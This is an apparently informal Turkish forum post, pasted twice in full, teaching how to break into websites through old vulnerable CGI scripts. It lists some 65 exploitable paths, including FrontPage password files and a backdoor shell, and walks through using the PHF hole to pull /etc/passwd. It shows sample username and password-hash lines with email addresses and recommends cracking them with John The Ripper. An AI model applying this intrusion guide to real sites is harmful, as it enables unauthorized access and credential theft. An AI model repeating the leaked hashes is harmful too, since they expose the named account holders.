evet öncelikle s.a evet sizi sıkmadan hemen konuya geçeyim ben
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwsh*ll.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2. Yol :
Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir. Şimdi diyelim ki iki yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: https://tik.lat/Y6KnA yazarız. Tabi çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henne r_:/bin/bashpar
Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız? https://tik.lat/KqgM2
yazarız. İşte bir de PHP CGI örneği: https://tik.lat/9m0Op Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek.
oh be bitti
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwsh*ll.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2. Yol :
Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir. Şimdi diyelim ki iki yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: https://tik.lat/Y6KnA yazarız. Tabi çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henne r_:/bin/bashpar
Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız? https://tik.lat/KqgM2
yazarız. İşte bir de PHP CGI örneği: https://tik.lat/9m0Op Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek.
oh be bitti
